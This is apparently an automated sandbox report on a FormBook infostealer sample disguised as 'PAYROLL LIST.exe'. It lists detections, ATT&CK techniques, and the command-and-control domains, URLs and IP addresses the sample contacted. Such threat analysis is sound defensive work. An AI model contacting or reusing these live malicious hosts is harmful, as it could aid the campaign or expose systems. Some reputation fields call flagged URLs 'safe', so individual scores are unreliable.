Source: PAYROLL LIST.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: PAYROLL LIST.exe	Binary or memory string: WIN_XPe
Source: PAYROLL LIST.exe	Binary or memory string: WIN_VISTA
Source: PAYROLL LIST.exe	Binary or memory string: WIN_7
Source: PAYROLL LIST.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4582414489.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4571302194.0000000002740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2407829653.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4584294088.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2407461524.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4581284077.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2408321100.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A78C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00A78C4F
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A7923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00A7923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	5 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	5 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PAYROLL LIST.exe	68%	ReversingLabs	Win32.Trojan.AutoitInject
PAYROLL LIST.exe	58%	Virustotal		Browse
PAYROLL LIST.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
www.optimismbank.xyz	1%	Virustotal		Browse
www.bankseedz.info	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.bankseedz.info/uf7y/	0%	Avira URL Cloud	safe
http://www.madhf.tech/3iym/?ftMDw=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLur5vg8ZgSRROrLy1+lGHKJKNnWrxIb45jIiCNbhxH2Mr3ltZMyC0=&s8q=0RJLtN5PAfjxwlrp	0%	Avira URL Cloud	safe
http://www.optimismbank.xyz/98j3/	0%	Avira URL Cloud	safe
http://www.bankseedz.info/uf7y/?s8q=0RJLtN5PAfjxwlrp&ftMDw=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7uIxlsu2feUJ4Szk5xT5T+y3eU9uLCnOG2a5m16YfDmqw1YUm1PU=	0%	Avira URL Cloud	safe
http://www.jcsa.info/hxi5/	0%	Avira URL Cloud	safe
http://www.jcsa.info/hxi5/?ftMDw=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzEMugr7cJJcxtzNX7Y0CkoSUd8KQdmwlNemHcmzIVDdoEsc/fDA6w=&s8q=0RJLtN5PAfjxwlrp	0%	Avira URL Cloud	safe
http://www.zkdamdjj.shop	0%	Avira URL Cloud	safe
http://www.madhf.tech/3iym/	0%	Avira URL Cloud	safe
http://www.zkdamdjj.shop/swhs/?ftMDw=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTeUs9QjKFG8O2A2x2bIvsQFy4qdLsSxXEiZwT1ITG2O8o4PgX9ko=&s8q=0RJLtN5PAfjxwlrp	0%	Avira URL Cloud	safe
http://www.xcvbj.asia/hkgx/?ftMDw=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUhy4T4sTZM/xDRABQgnb1kzJGDsq+SUnMZJlWPAYumgJQLN5L2R8=&s8q=0RJLtN5PAfjxwlrp	0%	Avira URL Cloud	safe
http://www.greenthub.life/r3zg/	0%	Avira URL Cloud	safe
https://www.register.com/whois?domainName=jcsa.info	0%	Avira URL Cloud	safe
https://zkdamdjj.shop/swhs/?ftMDw=8xf1FTtyUpYkrTYPPLWUAP	0%	Avira URL Cloud	safe
http://www.43kdd.top/p3j6/?ftMDw=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPE2HhSCay4NYmxqdiK6FXxy6O+wbL+pa0tLSnaR0JMUJOZeRHums=&s8q=0RJLtN5PAfjxwlrp	0%	Avira URL Cloud	safe
http://jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dflt	0%	Avira URL Cloud	safe
http://www.yc791022.asia/31pt/	0%	Avira URL Cloud	safe
http://www.thaor56.online/fev0/?s8q=0RJLtN5PAfjxwlrp&ftMDw=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKpfTM6+zZhK0Vfjoc5PqIe4votSjOaPjz9cBe2KS72Lx57OWhQ20=	0%	Avira URL Cloud	safe
http://www.43kdd.top/p3j6/	0%	Avira URL Cloud	safe
http://www.zkdamdjj.shop/swhs/	0%	Avira URL Cloud	safe
http://www.xcvbj.asia/hkgx/	0%	Avira URL Cloud	safe
http://www.madhf.tech/3iym/?ftMDw=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/f	0%	Avira URL Cloud	safe
http://www.laohub10.net/n2c9/?ftMDw=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/CPoWBEtyT9QkzZx0kn+vpM9MetzAzCeiDLL5rMhSVwK26gXmhOI=&s8q=0RJLtN5PAfjxwlrp	0%	Avira URL Cloud	safe
http://www.laohub10.net/n2c9/	0%	Avira URL Cloud	safe
http://www.yc791022.asia/31pt/?ftMDw=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/ZUs8uwlOB+QB3ca3FBmAxFrBZMPAxBodxEGaS/b2Tezz4FuYEzo=&s8q=0RJLtN5PAfjxwlrp	0%	Avira URL Cloud	safe
http://www.1secondlending.one/j8pv/?ftMDw=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b1DxYSdomJJ1cIHDMQoeegRhtBSr4yHNpY/YOIyeK233xsrfLHXE=&s8q=0RJLtN5PAfjxwlrp	0%	Avira URL Cloud	safe
https://www.register.com/?trkID=WSTm3u15CW	0%	Avira URL Cloud	safe
http://www.greenthub.life/r3zg/?ftMDw=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT0074duoQOsgGdcsNcrIEp/1wXAjvdugthi8/c+6JcbCpqpe/rFrA=&s8q=0RJLtN5PAfjxwlrp	0%	Avira URL Cloud	safe
http://www.optimismbank.xyz/98j3/?ftMDw=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoC7f9WIoubj4Q4JNsFH14w6x5H8IcaKKhJ/aIzC8GXeQraEN4MBg=&s8q=0RJLtN5PAfjxwlrp	0%	Avira URL Cloud	safe
http://www.1secondlending.one/j8pv/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.bankseedz.info	46.30.211.38	true	true	1%, Virustotal, Browse	unknown
www.optimismbank.xyz	13.248.169.48	true	true	1%, Virustotal, Browse	unknown
www.madhf.tech	103.224.182.242	true	false		high
r0lqcud7.nbnnn.xyz	23.225.160.132	true	true		unknown
www.xcvbj.asia	149.88.81.190	true	true		unknown
www.yc791022.asia	101.35.209.183	true	true		unknown
43kdd.top	38.47.232.202	true	true		unknown
thaor56.online	202.92.5.23	true	true		unknown
www.greenthub.life	209.74.77.109	true	true		unknown
www.1secondlending.one	43.205.198.29	true	true		unknown
www.zkdamdjj.shop	104.21.40.167	true	true		unknown
www.jcsa.info	208.91.197.39	true	true		unknown
www.laohub10.net	unknown	unknown	false		unknown
www.thaor56.online	unknown	unknown	false		unknown
www.43kdd.top	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.bankseedz.info/uf7y/	true	Avira URL Cloud: safe	unknown
http://www.madhf.tech/3iym/?ftMDw=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLur5vg8ZgSRROrLy1+lGHKJKNnWrxIb45jIiCNbhxH2Mr3ltZMyC0=&s8q=0RJLtN5PAfjxwlrp	true	Avira URL Cloud: safe	unknown
http://www.optimismbank.xyz/98j3/	true	Avira URL Cloud: safe	unknown
http://www.bankseedz.info/uf7y/?s8q=0RJLtN5PAfjxwlrp&ftMDw=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7uIxlsu2feUJ4Szk5xT5T+y3eU9uLCnOG2a5m16YfDmqw1YUm1PU=	true	Avira URL Cloud: safe	unknown
http://www.madhf.tech/3iym/	true	Avira URL Cloud: safe	unknown
http://www.jcsa.info/hxi5/	true	Avira URL Cloud: safe	unknown
http://www.jcsa.info/hxi5/?ftMDw=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzEMugr7cJJcxtzNX7Y0CkoSUd8KQdmwlNemHcmzIVDdoEsc/fDA6w=&s8q=0RJLtN5PAfjxwlrp	true	Avira URL Cloud: safe	unknown
http://www.zkdamdjj.shop/swhs/?ftMDw=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTeUs9QjKFG8O2A2x2bIvsQFy4qdLsSxXEiZwT1ITG2O8o4PgX9ko=&s8q=0RJLtN5PAfjxwlrp	true	Avira URL Cloud: safe	unknown
http://www.xcvbj.asia/hkgx/?ftMDw=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUhy4T4sTZM/xDRABQgnb1kzJGDsq+SUnMZJlWPAYumgJQLN5L2R8=&s8q=0RJLtN5PAfjxwlrp	true	Avira URL Cloud: safe	unknown
http://www.greenthub.life/r3zg/	true	Avira URL Cloud: safe	unknown
http://www.43kdd.top/p3j6/?ftMDw=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPE2HhSCay4NYmxqdiK6FXxy6O+wbL+pa0tLSnaR0JMUJOZeRHums=&s8q=0RJLtN5PAfjxwlrp	true	Avira URL Cloud: safe	unknown
http://www.43kdd.top/p3j6/	true	Avira URL Cloud: safe	unknown
http://www.yc791022.asia/31pt/	true	Avira URL Cloud: safe	unknown
http://www.zkdamdjj.shop/swhs/	true	Avira URL Cloud: safe	unknown
http://www.thaor56.online/fev0/?s8q=0RJLtN5PAfjxwlrp&ftMDw=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKpfTM6+zZhK0Vfjoc5PqIe4votSjOaPjz9cBe2KS72Lx57OWhQ20=	true	Avira URL Cloud: safe	unknown
http://www.laohub10.net/n2c9/?ftMDw=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/CPoWBEtyT9QkzZx0kn+vpM9MetzAzCeiDLL5rMhSVwK26gXmhOI=&s8q=0RJLtN5PAfjxwlrp	true	Avira URL Cloud: safe	unknown
http://www.laohub10.net/n2c9/	true	Avira URL Cloud: safe	unknown
http://www.xcvbj.asia/hkgx/	true	Avira URL Cloud: safe	unknown
http://www.1secondlending.one/j8pv/?ftMDw=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b1DxYSdomJJ1cIHDMQoeegRhtBSr4yHNpY/YOIyeK233xsrfLHXE=&s8q=0RJLtN5PAfjxwlrp	true	Avira URL Cloud: safe	unknown
http://www.yc791022.asia/31pt/?ftMDw=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/ZUs8uwlOB+QB3ca3FBmAxFrBZMPAxBodxEGaS/b2Tezz4FuYEzo=&s8q=0RJLtN5PAfjxwlrp	true	Avira URL Cloud: safe	unknown
http://www.optimismbank.xyz/98j3/?ftMDw=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoC7f9WIoubj4Q4JNsFH14w6x5H8IcaKKhJ/aIzC8GXeQraEN4MBg=&s8q=0RJLtN5PAfjxwlrp	true	Avira URL Cloud: safe	unknown
http://www.greenthub.life/r3zg/?ftMDw=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT0074duoQOsgGdcsNcrIEp/1wXAjvdugthi8/c+6JcbCpqpe/rFrA=&s8q=0RJLtN5PAfjxwlrp	true	Avira URL Cloud: safe	unknown
http://www.1secondlending.one/j8pv/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dts.gnpge.com	XQNtOWkQlf.exe, 00000007.00000002.4585605922.0000000004446000.00000004.00000001.00040000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.zkdamdjj.shop	XQNtOWkQlf.exe, 00000007.00000002.4587938098.00000000056E8000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.register.com/whois?domainName=jcsa.info	waitfor.exe, 00000005.00000002.4587102048.0000000006126000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000005.00000002.4589438733.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, XQNtOWkQlf.exe, 00000007.00000002.4585605922.0000000004446000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://zkdamdjj.shop/swhs/?ftMDw=8xf1FTtyUpYkrTYPPLWUAP	waitfor.exe, 00000005.00000002.4587102048.000000000644A000.00000004.10000000.00040000.00000000.sdmp, XQNtOWkQlf.exe, 00000007.00000002.4585605922.000000000476A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dflt	waitfor.exe, 00000005.00000002.4587102048.0000000006126000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000005.00000002.4589438733.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, XQNtOWkQlf.exe, 00000007.00000002.4585605922.0000000004446000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.madhf.tech/3iym/?ftMDw=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/f	XQNtOWkQlf.exe, 00000007.00000002.4585605922.0000000003DFE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.register.com/?trkID=WSTm3u15CW	XQNtOWkQlf.exe, 00000007.00000002.4585605922.0000000004446000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	waitfor.exe, 00000005.00000002.4589630622.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
101.35.209.183	www.yc791022.asia	China	132203	TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	true
209.74.77.109	www.greenthub.life	United States	31744	MULTIBAND-NEWHOPEUS	true
149.88.81.190	www.xcvbj.asia	United States	188	SAIC-ASUS	true
13.248.169.48	www.optimismbank.xyz	United States	16509	AMAZON-02US	true
104.21.40.167	www.zkdamdjj.shop	United States	13335	CLOUDFLARENETUS	true
43.205.198.29	www.1secondlending.one	Japan	4249	LILLY-ASUS	true
103.224.182.242	www.madhf.tech	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	false
208.91.197.39	www.jcsa.info	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
23.225.160.132	r0lqcud7.nbnnn.xyz	United States	40065	CNSERVERSUS	true
46.30.211.38	www.bankseedz.info	Denmark	51468	ONECOMDK	true
38.47.232.202	43kdd.top	United States	174	COGENT-174US	true
202.92.5.23	thaor56.online	Viet Nam	45899	VNPT-AS-VNVNPTCorpVN	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561743
Start date and time:	2024-11-24 08:26:58 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PAYROLL LIST.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@15/12
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 91% Number of executed functions: 48 Number of non-executed functions: 296
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:28:53	API Interceptor	9199618x Sleep call for process: waitfor.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
101.35.209.183	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	www.yc791022.asia/wu7k/
101.35.209.183	PO-DC13112024_pdf.vbs	Get hash	malicious	Unknown	Browse	www.yc791022.asia/grmn/
209.74.77.109	file.exe	Get hash	malicious	FormBook	Browse	www.moviebuff.info/4r26/
	PO #2411071822.exe	Get hash	malicious	FormBook	Browse	www.gogawithme.live/6gtt/
	Quotation.exe	Get hash	malicious	FormBook	Browse	www.gogawithme.live/6gtt/
	payments.exe	Get hash	malicious	FormBook	Browse	www.gogawithme.live/6gtt/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.dailyfuns.info/n9b0/
149.88.81.190	purchase Order.exe	Get hash	malicious	FormBook	Browse	www.xcvbj.asia/rq1s/
149.88.81.190	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.xcvbj.asia/rq1s/
13.248.169.48	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	www.tals.xyz/cpgr/
	VSP469620.exe	Get hash	malicious	FormBook	Browse	www.heliopsis.xyz/cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4
	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	www.tals.xyz/cpgr/
	Mandatory Notice for all December Leave and Vacation application.exe	Get hash	malicious	FormBook	Browse	www.tals.xyz/stx5/
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	www.tals.xyz/k1td/
	DOC_114542366.vbe	Get hash	malicious	FormBook	Browse	www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.remedies.pro/hrap/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.optimismbank.xyz/lnyv/
	New Order - RCII900718_Contract Drafting.exe	Get hash	malicious	FormBook	Browse	www.avalanchefi.xyz/ctta/
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.egldfi.xyz/3e55/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.optimismbank.xyz	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
www.xcvbj.asia	purchase Order.exe	Get hash	malicious	FormBook	Browse	149.88.81.190
www.xcvbj.asia	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	149.88.81.190
www.yc791022.asia	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	101.35.209.183
www.yc791022.asia	PO-DC13112024_pdf.vbs	Get hash	malicious	Unknown	Browse	101.35.209.183
www.zkdamdjj.shop	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	104.21.40.167
	NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbe	Get hash	malicious	FormBook	Browse	104.21.40.167
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
www.madhf.tech	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Item-RQF-9456786.exe	Get hash	malicious	Unknown	Browse	103.224.182.242
r0lqcud7.nbnnn.xyz	purchase Order.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	202.79.161.151
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	New Order - RCII900718_Contract Drafting.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
www.1secondlending.one	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	43.205.198.29
	Project Breakdown Doc.exe	Get hash	malicious	FormBook	Browse	43.205.198.29
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	43.205.198.29

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SAIC-ASUS	purchase Order.exe	Get hash	malicious	FormBook	Browse	149.88.81.190
	yakuza.i586.elf	Get hash	malicious	Mirai	Browse	139.121.41.93
	arm4.elf	Get hash	malicious	Mirai	Browse	149.83.228.200
	spc.elf	Get hash	malicious	Mirai	Browse	149.88.69.25
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	149.88.81.190
	mips.elf	Get hash	malicious	Mirai	Browse	149.64.190.242
	x86.elf	Get hash	malicious	Unknown	Browse	149.73.164.35
	zgp.elf	Get hash	malicious	Mirai	Browse	139.121.236.123
	amen.sh4.elf	Get hash	malicious	Mirai	Browse	149.80.195.123
	mpsl.elf	Get hash	malicious	Mirai	Browse	149.64.190.212
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	101.35.209.183
	https://app.smartsheet.com/b/form/9141bdd4d7da45789170a7064a677627	Get hash	malicious	HTMLPhisher	Browse	49.51.77.119
